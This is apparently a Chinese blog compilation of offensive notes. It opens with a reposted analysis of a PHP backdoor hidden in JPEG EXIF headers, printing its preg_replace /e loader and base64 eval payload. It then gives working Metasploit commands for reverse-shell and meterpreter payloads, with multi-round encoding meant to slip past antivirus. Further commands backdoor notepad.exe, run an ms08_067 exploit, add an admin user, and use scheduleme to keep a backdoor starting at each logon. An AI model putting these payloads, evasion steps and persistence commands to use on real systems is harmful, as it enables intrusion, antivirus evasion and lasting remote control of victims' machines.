一种隐藏在JPG图片EXIF中的后门

几天前,我们研究团队的 Peter Gramantik 在一个被攻破的网站上发现一个非常有趣的后门。这个后门并没有依靠正常模式去隐藏起内容(比如 base64/gzip 编码),但是它却把自己的数据隐藏在 JPEG 图片的 EXIT 头部中了。它也使用 exif_read_data 和 preg_replace 两个 PHP 函数来读取 EXIF 头部和执行。

技术细节
这个后门可分为两部分。第一部分是 exif_read_data 函数读取图片头部,preg_replace 函数来执行内容。下面是我们在被攻破网站上发现的代码:

$exif = exif_read_data('/homepages/clientsitepath/images/stories/food/bun.jpg');
preg_replace($exif['Make'],$exif['Model'],'');

这两个函数本身是无害滴。exif_read_data 函数常用来读取图片,preg_replace 函数是替代字符内容。不过,preg_replace 函数函数有个隐藏并微妙的选项,如果你传入 “/e”,它会执行 eval() 中的内容,就不是去查询/替代了。

所以我们在查看 bun.jpg 文件时,发现后门的第二部分:

ÿØÿà^@^PJFIF^@^A^B^@^@d^@d^@^@ÿá^@¡Exif^@^@II*^@
^H^@^@^@^B^@^O^A^B^@^F^@^@^@&^@^@^@^P^A^B^@m^@^@^@,^@^@^@^@^@^@^@/.*/e^
@ eval ( base64_decode("aWYgKGl zc2V0KCRfUE9TVFsie noxIl0pKSB7ZXZhbChzd
HJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));
@ÿì^@^QDucky^@^A^@^D^@^@^@<^@^@ÿî^@^NAdobe^

这个文件用以常见的头部开始,但是在 ”make” 头部中混入了奇怪的关键字 ”/.*/e” 。有了这个执行修饰符, preg_replace 会执行 eval() 中传入的任意内容。

事情变得开始有趣了……

如果咱们继续来看看 EXIF 数据,我们能发现, “eval ( base64_decode”隐藏在 ”Model“ 头部。把这些放在一起看,咱们就知道怎么回事了。攻击者是从 EXIF 中读取 Make 和 Model 头部信息,然后传入到 preg_replace 函数。只要我们修改 $exif[‘Make’] 和 $exif[‘Model’] ,就得到了最终的后门。

 

preg_replace ("/.*/e", ,"@ eval ( base64_decode("aWYgKGl ...");

解码后我们可以看到是执行 $_POST[“zz1”] 提供的内容。完整解码后的后面在这里

if (isset( $_POST["zz1"])) { eval (stripslashes( $_POST["zz1"]..

隐藏恶意软件
另外一个有意思的是,虽然 bun.jpg 和其他图片文件被修改了,但然后能加载并正常工作。实际上,在这些被攻破的站点,攻击者修改了站点上一个合法并之前就存在的图片。这是一种奇特的隐藏恶意软件的方法。

引自:freebuf.com

metasploit->msfencoding 一次加密多次加密,免杀。

[bash]

root@bt:/# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.101 LPORT=31337 R |msfencode -e x86/shikata_ga_nai  -t exe > /var/www/payload2.exe
[*] x86/shikata_ga_nai succeeded with size 342 (iteration=1)
|
root@bt:/# file /var/www/payload2.exe
/var/www/2.exe: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
We add the R flag at to the msfpayload command line to specify raw
output, because we will pipe its output directly into msfencode. We specify the
x86/shikata_ga_nai encoder at
and tell msfencode to send the executable out-
put -t exe to /var/www/payload2.exe. Finally, we run a quick check at to
ensure that the resulting file is in fact a Windows executable. The response
tells us that it is. Unfortunately, after the payload2.exe file is copied over to the
Windows system, AVG detects our encoded payload yet again, as shown :

[/bash]

R : 指定payload输出raw数据因为要加密,
payload的选择以及参数设置不用说. |为管道.  -e 后面是msfencode的加密方法, -t exe为msfencode的输出类型.

>后面是输出文件的路径

这是一次加密。多次加密如下:

[bash]

root@bt:/opt/framework3/msf3# msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.1.101 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5
-t raw
| msfencode -e x86/alpha_upper -c 2
-t raw | msfencode -e
x86/shikata_ga_nai -c 5
-t raw | msfencode -e x86/countdown -c 5
-t exe -o /var/www/payload3.exe
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 426 (iteration=5)
[*] x86/alpha_upper succeeded with size 921 (iteration=1)
[*] x86/alpha_upper succeeded with size 1911 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 1940 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 1969 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 1998 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 2027 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 2056 (iteration=5)
[*] x86/countdown succeeded with size 2074 (iteration=1)
[*] x86/countdown succeeded with size 2092 (iteration=2)
[*] x86/countdown succeeded with size 2110 (iteration=3)
[*] x86/countdown succeeded with size 2128 (iteration=4)
[*] x86/countdown succeeded with size 2146 (iteration=5)
root@bt:/opt/framework3/msf3#
Here we use five counts at of shikata_ga_nai, feeding the code in raw
format at into two counts of alpha_upper encoding at , which is then fed
to another five counts of shikata_ga_nai ,followed by five counts of countdown
encoding at , before finally directing the output into the desired execut-
able. We are using a total of 17 encoding loops in an attempt to circumvent
the antivirus software. And, as you can see in Figure 7-3, we have successfully
slipped our payload past the antivirus engine.

[/bash]

明显拉。多次加密就是加密多次。。。。。。。。<—-废话

但是要保证除最后一次生成需要的文件类型之外,中间管道的输入数据类型都必须是RAW数据。

msfpayload输出raw数据使用参数R.  msfencode输出raw数据使用参数 -t raw

在上文的例子中,每一加密都加密了多轮。 使用-c 参数进行控制。

最后附带上msfencode的help. help里面有详细参数说明哦.

[bash]

root@bt:~# msfencode -h

Usage: /opt/metasploit/msf3/msfencode <options>

OPTIONS:

-a <opt>  The architecture to encode as
-b <opt>  The list of characters to avoid: ‘\x00\xff’
-c <opt>  The number of times to encode the data
-d <opt>  Specify the directory in which to look for EXE templates
-e <opt>  The encoder to use
-h        Help banner
-i <opt>  Encode the contents of the supplied file path
-k        Keep template working; run payload in new thread (use with -x)
-l        List available encoders
-m <opt>  Specifies an additional module search path
-n        Dump encoder information
-o <opt>  The output file
-p <opt>  The platform to encode for
-s <opt>  The maximum size of the encoded data
-t <opt>  The output format: raw,ruby,rb,perl,pl,bash,sh,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vba-exe,vbs,loop-vbs,asp,aspx,war,psh,psh-net
-v        Increase verbosity
-x <opt>  Specify an alternate executable template

root@bt:~#

[/bash]

用Metasploit Framework给EXE文件加后门

官方网站 www.metasploit.com

大多来自 http://www.linux520.com/  感谢beach老师的无私奉献

http://www.linux520.com/v/l00047/l00047.html
http://www.irongeek.com/videos/msfpayload-msfencoder-metasploit-3-3.swf   这个两个视频都是比较有用的.
===================
msfpayload   msfencode      msfcli

===================
msfpayload -h

 Usage: /msf3/msfpayload <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]avascript|e[X]ecutable|[V]BA|[W]ar>

msfpayload windows/shell/reverse_tcp LHOST=192.168.1.13 LPORT=4455  R |  msfencode  -k -x  notepad.exe -t  exe  -e x86/shikata_ga_nai   -c 5 -o  diy_notepad.exe

msfcli exploit/multi/handler payload=windows/shell/reverse_tcp lhost=192.168.1.13 lport=4455  E

=====================

msfpayload  windows/adduser pass=123123 user=admin x >diy_user_add.exe 生成可执行文件

chmod +x diy_user_add.exe      添加此文件的执行权限(默认生成是没有执行权限的)

===============
$ msfcli -h
Usage: /msf3/msfcli <exploit_name> <option=value> [mode]

/msf3/msfcli <exploit_name> <payload_name> t(target) o(option)
========================================================

Mode          Description
—-           ———–
(H)elp         You’re looking at it baby!
(S)ummary      Show information about this module
(O)ptions      Show available options for this module
(A)dvanced     Show available advanced options for this module
(I)DS Evasion  Show available ids evasion options for this module
(P)ayloads     Show available payloads for this module
(T)argets      Show available targets for this exploit module
(AC)tions      Show available actions for this auxiliary module
(C)heck        Run the check routine of the selected module
(E)xecute      Execute the selected module

msfcli windows/smb/ms08_067_netapi payload=windows/shell/bind_tcp target=1 RHOST=192.168.1.13 LPORT=5555

metasploit生成shellcode的命令msfpayload

[bash]

root@ieroot:~# msfpayload -h

Usage: /opt/metasploit/msf3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar>

OPTIONS:

-h Help banner
-l List available payloads

root@ieroot:~#

[/bash]

可以生成各种格式的payload, 使用上述usage中最后一个参数设置.

msfpayload的用法和msfcli的用法类似.

[bash]

root@ieroot:~# msfpayload windows/x64/vncinject/reverse_tcp o

Name: Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
Module: payload/windows/x64/vncinject/reverse_tcp
Version: 14774, 15548, 14976
Platform: Windows
Arch: x86_64
Needs Admin: No
Total size: 422
Rank: Normal

Provided by:
sf <stephen_fewer@harmonysecurity.com>

Basic options:
Name Current Setting Required Description
—- ————— ——– ———–
AUTOVNC true yes Automatically launch VNC viewer if present
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
VNCHOST 127.0.0.1 yes The local host to use for the VNC proxy
VNCPORT 5900 yes The local port to use for the VNC proxy

Description:
Connect back to the attacker (Windows x64), Inject a VNC Dll via a
reflective loader (Windows x64) (staged)
root@ieroot:~#

[/bash]

其余就很明了了.选项的设置使用 类似于 LHOST=192.168.0.222 这样.查看options使用小写字母o.  生成类型使用C,J,X等设置.

 

另外msfencode可以用于对生成的payload或者叫为payload或者叫他后门都可以.来加密.

msfencode -l 查看可用的加密方式

msfencode  -h获得帮助

msfmap和scheduleme

最近在研究meterpreter,发现这个msfmap,给力啊。虽然还有和他差不多的,但………………

https://msfmap.googlecode.com/files/MSFMap-v0.1.1.tar.bz2
这是下载地址。
如何安装?
寻找你MSF所在,windows的你自己知道路径。BT5的一般在
/opt/metasploit/msf3
/pentest/exploits/framework3
我的是在第一个,大部分都应该一样。

给install.sh 加运行权限
然后输入
./install.sh /opt/metasploit/msf3
安装到msf3中。

加载msfmap,load msfmap
msfmap和nmap差不多。(其实差很多)

meterpreter > load msfmap
Loading extension msfmap…success.
meterpreter > msfmap -PN 192.168.0.1/24

Starting MSFMap 0.1.1
MSFMap scan report for 192.168.0.1
Host is up.
Not shown: 99 closed ports
PORT   STATE SERVICE
80/tcp open  http

MSFMap scan report for 192.168.0.100
Host is up.
Not shown: 100 closed ports

MSFMap scan report for 192.168.0.101
Host is up.
Not shown: 99 closed ports
PORT   STATE SERVICE
80/tcp open  http

MSFMap scan report for 192.168.0.103
Host is up.
Not shown: 97 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
6001/tcp open  X11:1

MSFMap scan report for 192.168.0.104
Host is up.
Not shown: 100 closed ports

MSFMap scan report for 192.168.0.105
Host is up.
Not shown: 98 closed ports
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https

MSFMap scan report for 192.168.0.107
Host is up.
Not shown: 97 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

MSFMap scan report for 192.168.0.108
Host is up.
Not shown: 97 closed ports
PORT    STATE SERVICE
21/tcp  open  ftp
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

MSFMap scan report for 192.168.0.111
Host is up.
Not shown: 95 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
3389/tcp open  ms-term-serv

MSFMap done: 256 IP address (9 hosts up) scanned in 57.54 seconds

meterpreter >

由于我家 宽带用的人较多。所以这不是重点。。。。。。。。。。。。。。。请忽略。/

meterpreter > msfmap -h
MSFMap (v0.1.1) Meterpreter Base Port Scanner
Usage: msfmap [Options] {target specification}

OPTIONS:

–top-ports <opt>  Scan <number> most common ports
-PN                Treat all hosts as online — skip host discovery
-T<0-5>            Set timing template (higher is faster)
-h                 Print this help summary page.
-oN         <opt>  Output scan in normal format to the given filename.
-p          <opt>  Only scan specified ports
-sP                Ping Scan – go no further than determining if host is online
-sS                TCP Syn scan
-sT                TCP Connect() scan
-v                 Increase verbosity level

上面参数好像就前两个可以用????  后面测试 全失败。不知道什么原因。
meterpreter > msfmap 192.168.0.100-120  这个也可以用。
这个扫描有点问题。不怎么准确。在找出nmap能加载进meterpreter时,暂时用这个。
———————————————————————————————————
meterpreter > run scheduleme -h
Scheduleme — provides most common scheduling types used during a pentest
This script can upload a given executable or script and schedule it to be
executed. All scheduled task are run as System so the Meterpreter process
must be System or local admin for local schedules and Administrator for
remote schedules

OPTIONS:

-c  <opt>  Command to execute at the given time. If options for execution needed use double quotes
-d         Daily.
-e  <opt>  Executable or script to upload to target host, will not work with remote schedule
-h         Help menu.
-hr <opt>  Every specified hours 1-23.
-i         Run command imediatly and only once.
-l         When a user logs on.
-m  <opt>  Every specified amount of minutes 1-1439
-o  <opt>  Options for executable when upload method used
-p         Password for account provided.
-r         Remote Schedule. Executable has to be already on remote target
-s         At system startup.
-t  <opt>  Remote system to schedule job.
-u         Username of account with administrative privelages.

run scheduleme -e /root/2222.exe -l

-s -i 参数都接不到sessions。
-l却可以。

上传个后门相当于永久会话。只要他有用户登录,都可以获得会话。超级给力。传个穿墙的上去,你懂的。

from  :  http://hi.baidu.com/67115248/item/085f9cd043b59b58fa576871